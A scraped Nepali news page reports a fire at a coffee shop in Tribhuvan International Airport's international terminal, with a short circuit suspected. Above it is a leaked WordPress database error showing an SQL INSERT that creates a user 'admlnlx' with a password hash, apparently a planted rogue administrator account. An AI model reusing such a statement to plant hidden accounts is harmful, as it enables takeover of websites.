WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B2VqfPD8agO79ybtwb/osb/MXrVyzW/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:39:29', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, काठमाडौं । त्रिभुवन अन्तर्राष्ट्रिय विमानस्थलको एक कफी पसलमा आगलागी भएको छ । अन्तर्राष्ट्रिय टर्मिनलको कफी सपमा आगलागी भएको हो ।
काठमाडौं प्रहरी परिसर, टेकुका डीएसपी होविन्द्र बोगटीले आगलागी भएको पुष्टि गरे ।
प्रारम्भिक अनुसन्धानमा विद्युत् सर्ट भएर आगलागी भएको हुनसक्ने देखिएको बताइएको छ । बिस्त्रित विवरण आउन बाँकी छ ।
sourse:onlinekhabar